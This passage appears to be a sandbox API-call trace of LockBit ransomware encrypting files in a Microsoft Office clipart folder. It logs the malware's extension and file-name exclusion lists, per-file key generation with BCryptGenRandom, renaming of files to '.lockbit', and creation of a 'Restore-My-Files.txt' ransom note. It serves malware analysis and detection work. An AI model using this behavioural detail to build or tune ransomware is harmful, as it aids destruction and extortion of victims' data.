lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01638_.WMF") returned 1 [0109.744] lstrcmpiW (lpString1="ntldr", lpString2="BS01638_.WMF") returned 1 [0109.744] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01638_.WMF") returned 1 [0109.744] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01638_.WMF") returned -1 [0109.744] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01638_.WMF") returned -1 [0109.744] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01638_.WMF") returned 1 [0109.744] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01638_.WMF") returned 1 [0109.744] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.744] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned=".WMF" [0109.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.744] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.744] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.745] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.745] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.lockbit") returned 72 [0109.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.746] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.746] malloc (_Size=0x40068) returned 0x3e70008 [0109.746] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=10538) returned 1 [0109.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.748] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.757] malloc (_Size=0xa6) returned 0x77d800 [0109.757] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.757] free (_Block=0x77d800) [0109.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.758] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.758] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c32800, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88c32800, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x108c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01639_.WMF", cAlternateFileName="")) returned 1 [0109.758] lstrcmpiW (lpString1=".", lpString2="BS01639_.WMF") returned -1 [0109.758] lstrcmpiW (lpString1="..", lpString2="BS01639_.WMF") returned -1 [0109.758] PathFindExtensionW (pszPath="BS01639_.WMF") returned=".WMF" [0109.758] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.758] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.759] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.759] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.760] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01639_.WMF") returned 1 [0109.761] lstrcmpiW (lpString1="ntldr", lpString2="BS01639_.WMF") returned 1 [0109.761] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01639_.WMF") returned 1 [0109.761] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01639_.WMF") returned -1 [0109.761] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01639_.WMF") returned -1 [0109.761] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01639_.WMF") returned 1 [0109.761] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01639_.WMF") returned 1 [0109.761] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.761] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned=".WMF" [0109.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.761] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.762] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.762] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.lockbit") returned 72 [0109.762] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.763] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.763] malloc (_Size=0x40068) returned 0x3db00b8 [0109.765] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=4236) returned 1 [0109.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0109.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0109.766] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0109.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.779] malloc (_Size=0xa6) returned 0x77d800 [0109.780] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.781] free (_Block=0x77d800) [0109.781] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.781] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.781] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.781] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x246a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CARBN_01.MID", cAlternateFileName="")) returned 1 [0109.781] lstrcmpiW (lpString1=".", lpString2="CARBN_01.MID") returned -1 [0109.781] lstrcmpiW (lpString1="..", lpString2="CARBN_01.MID") returned -1 [0109.782] PathFindExtensionW (pszPath="CARBN_01.MID") returned=".MID" [0109.782] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0109.782] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0109.782] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0109.782] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0109.782] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0109.783] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0109.783] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0109.783] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0109.783] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0109.783] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0109.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0109.784] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0109.784] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0109.784] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0109.784] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0109.784] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0109.784] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0109.785] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0109.785] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0109.785] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0109.785] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0109.785] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0109.785] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0109.786] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CARBN_01.MID") returned 1 [0109.786] lstrcmpiW (lpString1="ntldr", lpString2="CARBN_01.MID") returned 1 [0109.786] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CARBN_01.MID") returned 1 [0109.786] lstrcmpiW (lpString1="bootsect.bak", lpString2="CARBN_01.MID") returned -1 [0109.786] lstrcmpiW (lpString1="autorun.inf", lpString2="CARBN_01.MID") returned -1 [0109.786] lstrcmpiW (lpString1="thumbs.db", lpString2="CARBN_01.MID") returned 1 [0109.786] lstrcmpiW (lpString1="iconcache.db", lpString2="CARBN_01.MID") returned 1 [0109.786] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.786] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned=".MID" [0109.786] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0109.786] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0109.786] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0109.787] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0109.788] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0109.788] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0109.789] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.lockbit") returned 72 [0109.789] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.799] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.799] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.799] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9322) returned 1 [0109.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.800] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.807] malloc (_Size=0xa6) returned 0x77d800 [0109.807] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.808] free 